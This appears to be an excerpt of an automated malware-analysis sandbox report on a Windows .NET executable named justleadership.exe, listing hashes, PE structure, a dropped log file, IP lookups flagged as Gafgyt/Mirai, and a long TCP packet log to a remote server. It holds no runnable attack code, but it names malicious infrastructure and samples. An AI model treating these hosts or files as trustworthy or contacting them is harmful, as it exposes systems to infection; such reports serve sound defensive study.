                                            • 176.123.1.111
                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 176.123.1.111
                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 176.123.1.111
                                            na.elfGet hashmaliciousGafgyt, MiraiBrowse
                                            • 176.123.1.111

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\justleadership.exe.log

                                            Download File
                                            Process:C:\Users\user\Desktop\justleadership.exe
                                            File Type:ASCII text, with CRLF line terminators
                                            Category:dropped
                                            Size (bytes):1119
                                            Entropy (8bit):5.345080863654519
                                            Encrypted:false
                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                            MD5:88593431AEF401417595E7A00FE86E5F
                                            SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                            SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                            SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                            Malicious:true
                                            Reputation:moderate, very likely benign file
                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                            Static File Info

                                            General

                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                            Entropy (8bit):7.999467125338291
                                            TrID:
                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                            • DOS Executable Generic (2002/1) 0.01%
                                            File name:justleadership.exe
                                            File size:6'369'280 bytes
                                            MD5:d84496a9a986a9425b66d64560d8f1e1
                                            SHA1:fc41adcfe2cbbaafd65e1a7b817c8dbc3d1c3585
                                            SHA256:e92953ea4524720f25dab095abcfea67bb3df1b26d4bec4c2c7084fc48d0e362
                                            SHA512:a044793364cb36f1747e9cb317a96a4003782712a102c5972d83c438a6ce6a3d3d25434d8af500c41e6d1c06c4f17cda6f53ef0ea28b50e63596498466c2b49e
                                            SSDEEP:98304:8sjM37fwuCAVy1O/0YT+Qr+ZC+SW16sjvkLezVoSFj/hnYT3tDa5QrGXUXf:8sj87fJlVyEp+DpaeSSF/69XGXUXf
                                            TLSH:7C56334C3EE5702FDEB056B7C376BC8246A0B6BAE7EEA20EE045C59804039D574B6D47
                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...jh.g.................&a.........>Da.. ...`a...@.. ........................a...........`................................

                                            File Icon

                                            Icon Hash:90cececece8e8eb0

                                            Static PE Info

                                            General

                                            Entrypoint:0xa1443e
                                            Entrypoint Section:.text
                                            Digitally signed:false
                                            Imagebase:0x400000
                                            Subsystem:windows gui
                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                            Time Stamp:0x6706686A [Wed Oct 9 11:26:34 2024 UTC]
                                            TLS Callbacks:
                                            CLR (.Net) Version:
                                            OS Version Major:4
                                            OS Version Minor:0
                                            File Version Major:4
                                            File Version Minor:0
                                            Subsystem Version Major:4
                                            Subsystem Version Minor:0
                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                            Entrypoint Preview

                                            Instruction
                                            jmp dword ptr [00402000h]
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al
                                            add byte ptr [eax], al

                                            Data Directories

                                            NameVirtual AddressVirtual Size Is in Section
                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x6143e40x57.text
                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x6160000x5d6.rsrc
                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x6180000xc.reloc
                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                            Sections

                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                            .text0x20000x6124440x6126009155105ecc4f5370144f5a1688feb872unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                            .rsrc0x6160000x5d60x60071ec6b2f191d55b0546b5bb2e57d6194False0.4173177083333333data4.128959381565725IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                            .reloc0x6180000xc0x2003037295627ad0d3e1b9255ec9657d0cfFalse0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                            Resources

                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                            RT_VERSION0x6160a00x34cdata0.4099526066350711
                                            RT_MANIFEST0x6163ec0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                            Imports

                                            DLLImport
                                            mscoree.dll_CorExeMain

                                            Network Behavior

                                            Network Port Distribution

                                            TCP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Oct 15, 2024 22:47:59.767615080 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:47:59.772923946 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:47:59.773070097 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:47:59.773843050 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:47:59.778714895 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.681212902 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.681261063 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.681296110 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.681334019 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.681368113 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.681401968 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.681433916 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.681469917 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.681498051 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.681521893 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.681521893 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.681521893 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.681533098 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.681574106 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.681817055 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.686693907 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.686743021 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.686778069 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.686798096 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.686815977 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.686959982 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.836674929 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.836765051 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.836796045 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.836829901 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.836833954 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.836867094 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.836879969 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.836987972 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.837035894 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.837099075 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.837151051 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.837184906 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.837198973 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.837219000 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.837265015 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.837893009 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.837923050 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.837975025 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.841116905 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.841145992 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.841161013 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.841192007 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.891112089 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.953686953 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.953839064 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.953854084 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.953870058 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.953886986 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.953906059 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.953943014 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.954142094 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.954158068 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.954174042 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.954195023 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.954205990 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.954221964 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.954260111 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.954880953 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.957310915 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.957369089 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.957420111 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.957422018 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.957464933 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.957488060 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.957514048 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.992748976 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:00.992815018 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:00.992877007 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.047406912 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.071535110 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.071585894 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.071624041 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.071655989 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.071688890 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.071722031 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.071755886 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.071793079 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.071836948 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.071836948 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.071836948 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.071871042 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.072067022 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.072098970 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.072158098 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.074923992 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.074975014 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.075016975 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.075032949 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.125646114 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.148788929 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.148808956 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.148936987 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.168648005 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.168669939 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.168898106 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.197196960 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.197247028 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.197287083 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.197319984 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.197354078 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.197385073 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.197407961 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.197444916 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.197478056 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.197499990 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.197499990 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.197515965 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.197535992 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.197551966 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.197598934 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.198232889 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.198270082 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.198322058 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.266278028 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.266299963 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.266490936 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.285803080 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.285845995 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.285972118 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.306252003 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.306296110 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.306333065 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.306366920 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.306385040 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.306400061 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.306437016 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.306452036 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.306485891 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.306993961 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.307044983 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.307084084 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.307096004 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.309752941 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.309803963 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.309820890 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.309840918 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.309875965 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.309886932 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.309915066 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.309962034 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.383439064 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.383481979 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.383616924 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.402878046 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.402909994 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.402983904 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.423544884 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.423588991 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.423645973 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.423660994 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.423681974 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.423718929 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.423821926 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.423854113 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.423888922 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.423935890 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.423937082 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.424557924 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.424609900 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.424647093 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.424696922 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.424696922 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.427439928 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.427493095 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.427526951 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.427558899 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.427596092 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.427608013 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.427608013 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.427653074 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.501445055 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.501491070 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.501677990 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.520303965 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.520349026 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.520565987 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.540349007 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.540390968 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.540430069 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.540456057 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.540484905 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.540520906 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.540537119 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.540798903 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.540851116 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.540889025 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.540923119 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.540956974 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.540975094 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.541363955 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.541419983 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.541456938 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.544477940 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.544493914 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.544512033 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.544527054 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.544539928 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.544698000 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.544728041 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.544781923 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.544799089 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.594333887 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.618752956 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.618797064 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.618872881 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.637959957 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.637995958 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.638171911 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.659301996 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.659326077 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.659343004 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.659375906 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.659375906 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.659430027 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.659435987 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.659452915 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.659487963 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.659866095 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.659892082 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.659913063 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.659945965 CEST4973080192.168.2.491.208.206.5
                                            Oct 15, 2024 22:48:01.660278082 CEST804973091.208.206.5192.168.2.4
                                            Oct 15, 2024 22:48:01.660295010 CEST804973091.208.206.5192.168.2.4
